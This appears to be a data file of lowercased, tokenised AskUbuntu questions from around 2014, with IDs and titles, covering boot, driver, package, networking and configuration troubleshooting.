intel corporation 8 series/c220 series chipset family usb ehci # 1 [ 8086:8c26 ] ( rev 05 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm86 express lpc controller [ 8086:8c49 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] [ 8086:8c03 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 8 series/c220 series chipset family smbus controller [ 8086:8c22 ] ( rev 05 ) 07:00.0 3d controller [ 0302 ] : nvidia corporation gk208m [ geforce gt 740m ] [ 10de:1292 ] ( rev a1 ) 08:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 07 ) 09:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b2 ] ( rev 73 )
445601	dependency problem in installation	i am trying to install globus toolkit 5.2.5 . but i have some dependencies problem that i 'm not able to solve : mint @ subhash ~ $ sudo apt-get install globus-resource-management-sdk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : **globus-resource-management-sdk : depends : globus-rsl2 but it is not installable depends : libglobus-gsi-credential3 but it is not installable** e : unable to correct problems , you have held broken packages how can i solve this ?
445604	dual-boot windows 8.1 & ubuntu 13.10 . `` ca n't find /boot/grub/i386-pc/normal.mod ''	i 've been trying to get ubuntu 13.10 & windows 8.1 to boot together . i installed ubuntu on my main hard drive ( which came with windows pre-installed ) . however , when i tried to boot ubuntu , it just skips to windows . i 've looked through numerous questions , answers & forums and none of them have helped me . when i load windows , everything is fine but when i load ubuntu , i get this error : error : file `/boot/grub/i386-pc/normal.mod` not found entering rescue mode ... the first thing i did was run boot-repair but that did nothing . part way through boot-repair a dialog box appeared saying : winefi detected . backup and rename winefi files ? yes or no ? ( or something like that ) is that my problem ? i 've tried both ways with no luck . i have tried this on both uefi and legacy mode and both yield the same results . i have also tried toggling secure boot but this again seems to do nothing . here is the paste from after boot-repair ( the last one i did ) : http : //paste.ubuntu.com/7227403 can anybody help me ? this is getting really frustrating . thanks in advance .
445605	new win 8.1 ca n't share files to ubuntu 13.10	ubuntu can not access the shared resources on the windows 8.1 machine . i have gotten the share to work from ubuntu to win 8.1 but the ubuntu system does not seem to want to allow me to sign-on to the win 8.1 system . i have enabled networking on the win machine ( it is using home group as the net/domain name so i tried changing the samba config file to match it is giving/suggesting the user name of tom for me which is my ubuntu name and windows provides an arbitrary password , but it wo n't take ... ubuntu seems to see the win 8.1 machine fine ( presents it in the network browser , , but i just ca n't seem to get authorised ? i 'm using uid=tom domain=homegroup and the win 8.1 supplied password.. i have set the win 8.1 machine to share all.. pic docs printers etc ... the referenced question in the comment below is pointing out issues sharing from ubuntu not accessing a windows share ... . or how to find the d*** windows settings that are screwing things up.. so i may be a duplicate but not of that one !
445609	ca n't expand tree folder after switching directory with arrow keys	i 'm unable to expand a folder ( with the right arrow key ) listed with the tree functionality , when moving a folder up ( alt+arrow up ) . still i 'm able to solve this by doing the following manoeuvre . by pressing the arrow keys in this sequence : up/down ( change current selection ) down/up ( select previous ) right ( expand folder ) after navigating with upwards , i 'm still able to expand the folder with a left click of my mouse . but not immediately with my right arrow key . of course i 'm talking about the regular `` files '' software , i 'm running ubuntu 13.10 is this a bug ?
445612	how do i stop xscreensaver during movies play ?	i 'm running ubuntu 12.04 . i installed xscreensaver in place of gnome.screensaver . my problem is that i can not get the screensaver to stop popping up when i 'm watching a movie on movie player . i have movie player set to disable screensavers but it 's not working on xscreensaver . how do i change the program files to disable xscreensaver while movie player is running ?
445615	easy method of switching from openvpn-acess server to community edition ?	i recently installed the openvpn-access server on a vps and it 's great . however , now that i got it running i want to switch over to the community-edition because i do not want to deal with purchasing licenses and i think the c.e . will do everything i need it to . i was wondering if anyone knows if there a simple way to switch from as to ce and keep my current configuration settings without having to reinstall the whole thing and regenerate the keys & certificates ? any help would be greatly appreciated .
445616	wifi restoring in ubuntu	i ran the command gedit /etc/modprobe.d/iwlwifi.conf i also deleted the offending line wifi connection is showing in network manager but it is not connecting i also ran sudo iwconfig output is wlan0 ieee 802.11bgn essid : '' rfnet '' mode : managed frequency:2.462 ghz access point : 9c : d6:43:16:21:20 bit rate=2 mb/s tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=48/70 signal level=-62 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:1457 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . when i connect with mobile broadband or modem it gives the ip address of wifi network and if i want to istall or update anything via teminal it just do this % [ connecting to 192.168.100.3 ( 192.168.100.3 ) ] [ connecting to 192.168.100.3 but it dow not connect ... help me ... .i am new to ubuntu
445617	access to ubuntu	i am a novice , so need simple instructions . i downloaded ubuntu online to see if it could replace my current windows xp , but when restarted , windows xp starts , not ubuntu . how do i use ubuntu , and how do i get this to use and english keyboard ?
445620	a free or otherwise defrag program for ubuntu ? can i just put ubuntu ntfs exthdd on windows 7 and successfully use windows defrag ?	a free or otherwise defrag program for ubuntu ? can i just put ubuntu ntfs exthdd on windows 7 and successfully use windows defrag ? can i bring it back to ubuntu 13+ and run it w/o problems ? i want sooooo much to do everything in ubuntu , but that is a very large tree to grow !
445623	recompile package ( with applied .diff file ) after every update	i have a .diff file which i use to patch unity source code and then recompile it , so i can remove trash icon from unity panel which is important to me . however after every update of unity , the patched version is obviously updated with the newer version from ubuntu repos . my question is if it is possible to have a script run after every update of unity which does the following : 1 ) downloads newest source code from repos 2 ) applies patch 3 ) compiles the source 4 ) installs the package the script is easy to write , but my question is how to have the script run after every update of unity package ? i know there is something like dkms for kernel , so patches to kernel are applied after every update . is something like that possible for normal package , like unity ? thank you
445624	pyrit cpu benchmark in vmware much faster than on host	can anyone explain me ... why on vmware guest ubuntu , cpu is faster than on host ubuntu ... with 'pyrit benchmark' system : cpu : i7 3770 ( hyperthreading enabled ) ram : 24gb gpu : nvidia gtx 650 ti boost i have a dualboot : windows 7 & ubuntu 12.04 lts on windows 7 installed vmware workstation 10 , and guest os ubuntu 12.04 ( the same as secondary boot ) . running `` pyrit benchmark '' command on both systems . using only cpu ( gpu driver is not installed ) on vmware guest ubuntu , i get about 617 pmks/s * 8 cores ~ 4700-4900 pmks/s and on host ( secondary boot ) ubuntu i get about 213-250 pmks/s per core ~ 1700 pmks/s why ? and how can i get these rates in host ubuntu ? thank you .
445625	13.10 - no headphone sound	i have a major problem . i recently bought an acer e1 - ubuntu 13.10 as os . ( my first foray into linux after getting exasperated over a bug in anoter os ) . since a bomb blast some years ago , i am heavily hearing impaired . however , with my headphones , i have been able to listen to the radio - and maintain a good relationship to my neighbours . this solution does not work in ubuntu . my headphones are dead . ( the external speakers do not work either ) . i suspect , that the reason is simple . in system settings , the sound is set to play through the speakers in the built in audio . i am trying to add an external option - but just do not get it . ( in another thread clicking on the connector is suggested . there is no such option here - at least not wot i see ) . any ideas ?
445627	multiple google drive accounts ( grive )	i have installed grive for my google drive integration in ubuntu 12.04 , can i to add multiple google accounts with multiple grive instances ? i 'm doing something similar with dropbox then i would think that i can do the same with grive . thanks
445631	network controller disappeared on hp compaq 6715s with ubuntu 12.04lts	i am an absolute beginner with ubuntu and have no knowledge of how computers work ( like jen from it-crowd if you want ) . until today i ran windows xp alongside with ubuntu 12.04 and everything worked well . today i installed ubuntu 12.04 via usb-stick and replaced windows xp . now i do n't have wireless lan anymore . the switch for my wlan used to shine a blue light when it 's turned on - now it does n't shine and i have tried turning it off and on again without any effect . i also have installed all the latest updates for ubuntu 12.04 and have restarted the notebook several times . no wlan . i tried `` system settings '' - > `` additional drivers '' but there is no driver to choose from . then i tried rfkill list but no list appears . then i tried the following : : ~ $ lsmod | egrep '_acpi|_bluetooth|intel_oaktrail|_laptop|_rfkill|_wmi ' hp_wmi 17834 0 sparse_keymap 13658 1 hp_wmi pata_acpi 12886 0 wmi 18744 1 hp_wmi then this : : ~ $ echo `` hp_wmi '' | sudo tee -a /etc/modules [ sudo ] password for wurstwohnung : hp_wmi still not working . what must i do ? please help me . p.s . : lspci showed : : ~ $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd/ati ] rs690 host bridge 00:01.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rs690 pci to pci bridge ( internal gfx ) 00:04.0 pci bridge : advanced micro devices , inc. [ amd/ati ] device 7914 00:05.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rs690 pci to pci bridge ( pci express port 1 ) 00:06.0 pci bridge : advanced micro devices , inc. [ amd/ati ] rs690 pci to pci bridge ( pci express port 2 ) 00:12.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb600 non-raid-5 sata 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci0 ) 00:13.1 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci1 ) 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci2 ) 00:13.3 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci3 ) 00:13.4 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb ( ohci4 ) 00:13.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb600 usb controller ( ehci ) 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 14 ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] sb600 ide 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb600 pci to lpc bridge 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge 00:18.0 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs690m [ radeon xpress 1200/1250/1270 ] 02:04.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev b6 ) 10:00.0 ethernet controller : broadcom corporation netlink bcm5906m fast ethernet pci express ( rev 02 )
445632	installing tar.gz file on ubuntu 12.04	completely new to coding , linux , and ubuntu . attempting to install the `` stencyl '' program . downloaded the tar.gz file . opened the terminal and installed libgc-dev ( the packages for the compiler ) using this command : sudo apt-get install libgc-dev from there , i am 100 % lost . how do i locate the file in my directory and install it ? i have the extracted and original archived file . i 'd rather look stupid and learn how to do this the right way than give up and go back to windows .
445633	trouble installing 13.10 along xp	i am a newbee . tried to install 13.10 along with xp . nothing except a blank screen comes up . on right click i can create folders . how do i get in/out ? thanks
445634	can not find a driver for a wireless pci card , netis systems wf-2117	i 'm running 12.04 and do not have a clue how to set up my wireless card . the strange thing is the box says that it 's made by netis . but on a query ( lspci ) of the device , it says : 01:02.0 network controller : ralink corp. device 5362 i guess ralink manufactured their chips . i looked on the netis site , and they only have a windows driver . i looked on the ralink site , which has moved , and they do not have a driver for that device or model number . could someone suggest a driver that might work as far as the ralink ones go or is there a workaround maybe ? hoping someone else has some time and can walk a newb through this task .
445635	install on hp chromebook 11 without crouton	perhaps i missed something , but all over the internets are articles on running ubuntu on an arm chromebook ( i have the hp 11 ) with crouton . has anyone installed ubuntu on an hp 11 chromebook w/o crouton ? i 'd prefer to run linux in a non-chroot environment . i 've read inklings that ubuntu 14.x will support arm chromebooks , i 've read that chrubuntu does n't work with an hp 11 . i 'm currently running archlinuxarm , but it 's quirky at best and requires a lot of manual intervention to get basic things working ( i 'd prefer not to search so to figure out how to keep the system clock from resetting , connecting to wifi-as non-root , making power-management work , etc. ) . the information/links provided here : http : //www.ubuntu.com/download/arm do n't seem applicable , i do n't want a server or an omap installation . or can i install an arm server on a chromebook and then pile on ubuntu-desktop packages ?
445636	why is n't the wallpapers changed when i upgrade to a beta release ?	i updated 13.10 saucy salamander to 14.04 through the terminal . system settings says i am running 14.04 but i see nothing different . the desktop wallpapers are all the same with saucy salamander . i did n't use a usb stick . should i just re install ? did i do something wrong ?
445637	can i enable bash-completion for the new apt command ?	the new apt command in 14.04 seems to be a really useful intersection of functionality between apt-get and apt-cache but the current version of bash-completion does n't know about it ... which makes it a lot harder to use . is there a quick way to add this functionality to bash to make the apt command easy to use ?
445641	rhythm box crashes when i plug in my iphone	i 've just downloaded ubuntu as a swap from mint . i heard it was easier to sync your iphone with ubuntu however , everytime i open rhythm box it crashes as soon as i plug my phone in ? any ideas ? ( except to stop using apple products of course ! ) cheers !
445644	missing password-asking dialog popup on session via vnc-ssh	i 've almost got to have a remote ubuntu desktop working exactly as id it was a local session , but still ca n't solve a little issue wich is driving me crazy . i have a remote machine with ubuntu desktop . i connect to it via vnc over ssh , and as i say `` almost everything '' works perfectly , except for a problem i 'm not getting to solve and i ca n't figure out whether it 's a problem regarding to permissions , to the own vnc ( i do n't think so ) , or whatever . when , for example , i open the ubuntu software center and try to install any program clicking on `` install '' , nothing happens , because the password-asking popup dialog never appears and so , ubuntu ca n't install it . it 's not about installing packages , since i can do it with aptitude , or even executing the usc as root , but i would like to fix it in other way since i do n't want to be executing programs as root when it 's not the proper way . my question is : anybody knows why could this be happening and how to solve it ? following with the example of installing some app with usc , the messages on /vat/log/syslog are these ( no errors though , but never appears the password-asking dialog ) : apr 9 22:11:33 noname-machine dbus [ 551 ] : [ system ] activating service name='org.debian.apt ' ( using servicehelper ) apr 9 22:11:33 noname-machine aptdaemon : info : initializing daemon apr 9 22:11:33 noname-machine dbus [ 551 ] : [ system ] successfully activated service 'org.debian.apt' apr 9 22:11:33 noname-machine aptdaemon.packagekit : info : initializing packagekit compat layer apr 9 22:11:51 noname-machine aptdaemon : info : commitpackages ( ) was called : dbus.array ( [ dbus.string ( u'gameconqueror ' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) , dbus.array ( [ dbus.string ( u '' ) ] , signature=dbus.signature ( 's ' ) ) apr 9 22:11:51 noname-machine aptdaemon.trans : info : queuing transaction /org/debian/apt/transaction/be384a2ba642461dbf4c33e8fdb363ec ( no messages on /var/log/auth.log ) exactly the same problem when clicking `` check '' on update manager : apr 9 22:43:53 noname-machine aptdaemon : info : updatecache ( ) was called apr 9 22:43:53 noname-machine aptdaemon.trans : info : queuing transaction /org/debian/apt/transaction/35fae3fa030a497f8cb5405701c8d2d2 apr 9 22:43:54 noname-machine aptdaemon : info : updatecache ( ) was called apr 9 22:43:54 noname-machine aptdaemon.trans : info : queuing transaction /org/debian/apt/transaction/13c03177009847dc9ce23c7913d44be7 apr 9 22:43:55 noname-machine aptdaemon : info : updatecache ( ) was called apr 9 22:43:55 noname-machine aptdaemon.trans : info : queuing transaction /org/debian/apt/transaction/e2db780da371473099d3655f76e2510d apr 9 22:43:55 noname-machine aptdaemon : info : updatecache ( ) was called apr 9 22:43:55 noname-machine aptdaemon.trans : info : queuing transaction /org/debian/apt/transaction/6f7a8a32df864d12b5372a11bc10481e anybody can see the problem ? ( please excuse my english )
445646	installed xubuntu on xp system but can not boot it	i just installed xubuntu on a windows xp machine . i left windows xp on the machine , and made a new logical drive , e , to which i installed xubuntu . during the installation , i was asked to install `` grub '' something-or-other that would let me choose which os i used at boot time . i tried several times to install that , but failed every time , so went on to finish the install without `` grub . '' i then got a message saying i would have to load xubuntu `` manually '' by means of some kind of kernel operation . i have no idea how that works . now , when i start up the computer it loads windows and ignores xubuntu . i have tried to change the boot order , but the only relevant option is `` hard disk , '' which automatically loads the os on c. i can not select my new logical drive e as the boot drive . how can i load xubuntu ? thanks and best regards .
445647	ban icons from systray	i have an application , which has a systray-icon . i want to make the icon disappear , without uninstalling the app . it should still keep on running in the background . thanks for your help . kl
445653	how to configure pxelinux.cfg/default properly in order to install ubuntu from network ?	i 'm trying to set up pxe in order to install ubuntu 13.10 server x64 through local network . so far , i can boot through pxe and , when using pxelinux.cfg/default provided by default , be able to install ubuntu by downloading it from a mirror . i want to be able to install ubuntu from nfs . i edited pxelinux.cfg/default like this : 1 # d-i config version 2.0 2 default ubuntu-installer/amd64/boot-screens/vesamenu.c32 3 menu title ubuntu setup 4 label ubuntu-13.10-server-amd64 5 menu label ubuntu-13.10-server-amd64 6 kernel 3.11.0.18-generic 7 append netboot=nfs initrd=install/initrd.gz nfsroot=192.168.1.75 : /âľ exports/ubuntu-13.10-server-amd64 ip=dhcp rw 192.168.1.75 is the ip of the server i use for dhcp , dns and nfs , i got the kernel 3.11.0.18-generic by running uname -r , showmount -e 192.168.1.75 gives : export list for 192.168.1.75 : /exports/ubuntu-13.10-server-amd64 192.168.1.0/24 the directory contains the contents of the original ubuntu-13.10-server-amd64 image . when booting from pxe , i get the original screen ( see screenshots below ) , then another one . pressing tab shows the command : 3.11.0.18-generic netboot=nfs initrd=install/initrd.gz nfsroot=192.168.1.âľ 75 : /exports/ubuntu-13.10-server-amd64 ip=dhcp rw pressing enter does nothing . i imagine there is something wrong with my changes of pxelinux.cfg/default . what 's wrong with it ? is there a comprehensive documentation of the options to set ? are there logs which can help understanding what is wrong ?
445654	hide app from tray in lxde ( lubuntu )	in xfce it is possible to hide app from tray , using tray settings ( for example set steam not to appear in tray , using xfce settings ) . i need such a feature in lubuntu , however lxpanel does n't seem to have such a settings . but maybe there is some config file where i can put banned applications for systray ? thanks
445657	ubuntu 13.10 running very slow unlike former win xp professional	i have always been a win xp user . i changed to ubuntu one 13.10 yesterday . i thought ubuntu might be much faster . it is so very very slow . what can b the problem ? i used an usb to install ubuntu on my laptop ( 32 bit ) . this actually worked out good . maybe my laptop is too old ? it is an acer aspire 5610 . i used win xp professional on it which was okay . now the new graphical designs move around super slow . like the windows take long to open , everything is in slow motion . even when i drag and drop items from external flesh drives on my desktop- sometimes they do n't even want to be moved at all . or when i install new software it takes years for the icons to move into the right position on the launchpad . even online videos do take too long , the voice is fine but the videos too slow . laptop information : acer aspire 5610 driver/graphic : gallium 0.4 on llvmpipe ( llvm 3.3 , 128 bits ) processor : genuine intelâž cpu t2050 @ 1.60ghz ă 2 32 bit is this laptop to slow ?
445658	dual boot unable to find a medium containing a live file system	i am facing this problem once i try to install ubuntu as a dual boot with my windows 8.1 . i have been reading posts all day long and have tried pretty much everything i can think of . i am an ubuntu noob so any help will be much appreciated.what have i done so far : changed my bios from ide to achi . ( i have a gigabyte ga-970a-ud3 mobo , i 've read they cause this problem a lot ) checked 3 different size usbs with 4 different boot making programs ( ubuntu startup disk creator , unebootin , linux live usb etc ) and a dvd . disconnected all my drives except my ssd that has the windows and i want to install ubuntu on . tried both 64 and 32bit iso i enabled iommu from my bios . i m sure i did more but after of 6-7 hours of trying i am starting to lose hope and do n't even remember the rest ! if anyone has anything to advice will be greatly appreciated . tnx in advance .
445660	running executable file	i am pretty new to ubuntu and have done following . i have made a file named pinkbunny using following commands and have written some text in it . khan @ ubuntu : ~ $ cat > pinkbunny hellow guys ! ^c khan @ ubuntu : ~ $ chmod +x pinkbunny now since it has now become executable it now should be displaying its contents whenever i call it but following error keeps popping up . pinkbunny : command not found i know there is some problem in setting path but donot know how to do it ?
445666	i just decided to try ububtu and want to know how to get it on the computer from the disc i made ?	deided to try and ditch windows xp and found ubuntu and put it on disc last night , i need to know how to have it boot on my computer from the disc
445670	ubuntu - chrome os look	is it possible to somehow apply the look of chrome os on ubuntu ? i need exactly the same look : d
445673	problem with lexmark pro705 printer in ubuntu 12.04	i 'm having a problem with printing with a lexmark pro705 printer in ubuntu 12.04 the properties of the print job for the test page http : //imgur.com/j2pahof i get the message : the printer can not communicate with the computer .
445676	ctrl-space not working in terminal after installing cinnamon	i recently switched my desktop environment from gnome to cinnamon . in my terminal , i use tmux , and have my prefix key mapped to ctrl-space . after the upgrade , ctrl-space stopped being captured by tmux . i tried running xev , and get this output when i hit ctrl-space . keypress event , serial 37 , synthetic no , window 0x3400001 , root 0x9e , subw 0x0 , time 49566192 , ( 609,435 ) , root : ( 611,505 ) , state 0x0 , keycode 37 ( keysym 0xffe3 , control_l ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false focusout event , serial 37 , synthetic no , window 0x3400001 , mode notifygrab , detail notifyancestor focusin event , serial 37 , synthetic no , window 0x3400001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 37 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 i am running ubuntu 14.04 , and cinnamon 2.0.14
445677	issue with downloading ubuntu	when i attempt to download ubuntu desktop , i get a message to go to a website about windows file associations or extensions . there are a number of options there , but i do n't know which to select or how to proceed . is there a way around ( or thru ) this ? thanks .
445681	can not istall/remove packages	i am a novice in world of ubuntu termial . i downloaded codeblocks and then 'build-essentials ' , but the 2nd package stopped in b/w due to internet connection failure , so i closed the terminal . thereafter , i am not able to install/remove any package . it @ it : ~ $ sudo apt-get install codeblocks reading package lists ... done building dependency tree reading state information ... done codeblocks is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 232 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up initramfs-tools ( 0.103ubuntu1 ) ... update-initramfs : deferring update ( trigger activated ) cp : can not create regular file â/cdrom/casper/initrd.gz.newâ : no such file or directory dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it @ it : ~ $ kindly help me . my system have : - intel i7 processor 4 gb ram i am using xubuntu ( 64-bit-amd ) ( 13.10 ) ( saucy salamander ) from my usb ( bootable usb created using yumi multiboot installer )
445685	ubuntu forward ports , default state , forwarding not working ?	im running ubuntu 12.04.4 server . i been googling the nett for answers , but could not find any.. i would like accsess a few web-gui 's on my server . i have forwarder the ports in my router , worked when i runned the same programs on a windows server , but when i went over to linux , all stopt working when im not on lan . i have not configured iptables at all.. as far as i know iptables is accepting all requests by default ? anyway , if i need to configuer iptables this is the port . looks like on lan : htps : //server-lan-ip:9090 and i would reache the web-gui . when i used windows server is could simply reache the web-gui form exsternal locations on : `` htps : //my-exsternal-ip:9090 '' ( yes i know its two tt* ) i have tried diffrent iptables rules the i tought would work , but no luck for exsternal location : ( any suggestions to what i should do ? i have runned iptables -l -n there are no rules in motion . thx
445686	vim can not find syntax.vim	recently , i needed to build vim from source to use a plugin that required lua interpreting . this worked fine on my laptop , but my tower computer is having some issues . any time i run vim , i recieve the message : error detected while processing /home/xxxxxx/.vim/vimrc : line 55 : e484 : ca n't open file /usr/share/vim/vim74/syntax/syntax.vim not surprisingly , vim then fails to highlight syntax , and throws a bunch of other errors when editing text . having done some research myself , i can tell that syntax.vim is actually in /usr/local/share/vim/vim74/syntax/syntax.vim , as opposed to the previously mentioned directory . how can i solve this ? more info vim was installed using checkinstall . to compile it , i ran the commands : ./configure -- with-features=huge -- enable-cscope -- enable-pythoninterp=yes -- with-python-config-dir=/usr/lib/python2.7/config-x86_64-linux-gnu -- enable-multibyte -- enable-fontset -- disable-gui -- disable-netbeans -- enable-luainterp=yes -- with-lua-prefix=/usr/include/lua5.1 -- enable-largefile make vimruntimedir=/usr/share/vim/vim74
445688	resarts when i 'm working of or online using 12.04	ďťżubuntu 12.04 ! 1 ) unit shuts down and restart. ! 2 ) mouse freezes 3 ) keyboard locks-up 4 ) audio loops - about one haft secound ( like a skipping record . if there is anyone there old enough to know what a vinal record is ? haha0 ) . 5 ) the computer shuts down and reestarts without a cold boot . all the above happens not in sequence but in a randem manner . have tried several clean reboot commands these are : a ) ctrl+alt+f2 then run top/killpkill , b ) alt+sysrq+r then ctrl+alt+f2 , c ) ctrl+alt+backspace , d ) alt+sysrq+r then alt+backspace , e ) alt+sysrq+r then ctrl+alt+del , f ) ctrl+alt+del , g ) alt+sysrq+r+e+i+s+u+b ( reisub ) ( forces a clean rebout ) , but none of them work.please note that this problem only happens when running vedio through my browsers ; i 've tried three different browsers , all with the same result . i 've tried a new vedio card , problem persists so it is not hardware . please note ... i have played dvd vedios and movies on the computers cd/dvd drive whitout any freeze-up or crashes . can you help me . thank you . archer9000 archer9000 @ gmail.com lionel legault .
445692	what 's going on with ssl ?	i read kenton warda 's post that the exploit in ssl in most linux os 's have been patched . has ubuntu been patched ? what should i avoid doing if it is n't ?
445694	how can i install a tar.gz package in the terminal ?	how do i install a tar.gz package in ubuntu 13.10 in the terminal ? must i use apt-get ? i have tried to use the .deb package commands , but that does n't work . ubuntu software center will not open the package .
445695	full screen / maximize top edge action only works on main monitor ( dual monitor setup ) compiz	certain applications that i have ( terminal , nvidia xserver settings , and a few others ) will go full screen properly-that is , whatever monitor i am viewing the application window in , if i drag it up to go full screen , it will go full screen in that monitor . a few other ones , however ( chrome , thunderbird ) , when i am in my secondary monitor , and i drag the window up to go full screen , it resizes the window to full screen in the other monitor , my main one . what is going on here ? my xorg.conf file : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ allspice ) wed dec 18 09:07:35 utc 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` nec lcd1960nxi '' horizsync 31.0 - 80.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 770 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dvi-i-1 : nvidia-auto-select +0+0 , hdmi-0 : nvidia- auto-select +1280+62 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection i 've read answers about flash player problems , but that is not applicable to me . i also downloaded compizconfig settings manager , but did n't see anything in there . thanks in advance !
445697	booted up into grub rescue unable to bypass to other partitions	i had recently installed ubuntu 13.10 on to a hdd on my desktop computer which is already dual booting windows 8.1 and windows 7 . the installation went fine the first time but i wanted to try to add ubuntu to the windows mbr so i installed it a second time . this time installing it without a bootloader which caused it to boot up into rescue mode which i am unable to bypass to access my windows partitions . i then reinstalled a third time and set it to configure a bootloader . the installation went fine but when i rebooted i still have rescue mode come up . i am not sure what to do now . any help would be appreciated . thanks , jacob
445700	how to install drivers in ubuntu 14.04 final beta	i have just installed ubuntu 14.04 final beta . but i am looking for a way to install drivers for nvidia graphic card , wireless card , touchpad . my laptop has a nvidia geforce 710m with 2gb dedicated vram graphics card also i am not able to change the brightness of screen with fn+ ( required key ) . how should i fix it ? should i install intel graphics drivers as well ? i much worried about graphics drivers because i want to play games via stream : ) laptop : acer aspire e1-571g thanks for the help in advance
445701	gpt partition scheme	i 'm reinstalling my operating systems to use gpt and am willing to do it properly this time ... i 'm intending to use the following partition scheme : sda | -- sda1 500 mib efi | -- sda2 100 gib linux | -- sda3 100 gib linux | -- sda4 128 mib windows system partition | -- sda5 422 gib windows | -- sda6 300 gib files repo | -- sda7 8 gib swap any comments here ? i 've read that gpt provides fault-tolerance by keeping copies of the partition table in the first and last sectors of the disk ; should n't i leave some free space at the end of the disk then ? am i missing something here ? thanks in advance .
445702	need help with lenovo t500 video card on a ubuntu 13.10+ os	i have the following i need help to upgrade . who can i or do i talk to about how to upgrade drivers on ubuntu 13.10 saucy linux on a t500 laptop ? now i 'm a microsoft mcp certified windows tech and work on macs as well . this os is not friendly yet . where can you point me to figure this out and how to upgrade this driver to use ati video card ? now the systems setting state it 's a mobile intel gm45 chipset for graphics . my laptop has two graphic cards the intel built in and ati on pci express slot . this is the video card i have : should be a ati mobility radeon hd 3650 or rv6xx -display- resolution : 1680x1050 pixels vendor : the x.org foundation version : 1.14.5 -monitors- monitor 0 : 1680x1050 pixels -extensions- big-requests composite damage double-buffer dpms dri2 glx generic event extension mit-screen-saver mit-shm randr record render security sgi-glx shape sync x-resource xc-misc xfixes xfree86-dga xfree86-vidmodeextension xinerama xinputextension xkeyboard xtest xvideo xvideo-motioncompensation -opengl- vendor : unknown renderer : unknown version : unknown direct rendering : no
445703	how to install packstack on ubuntu	currently packstack is not supported on ubuntu . is there anything equivalent to packstack that i could install on ubuntu ? thanks .
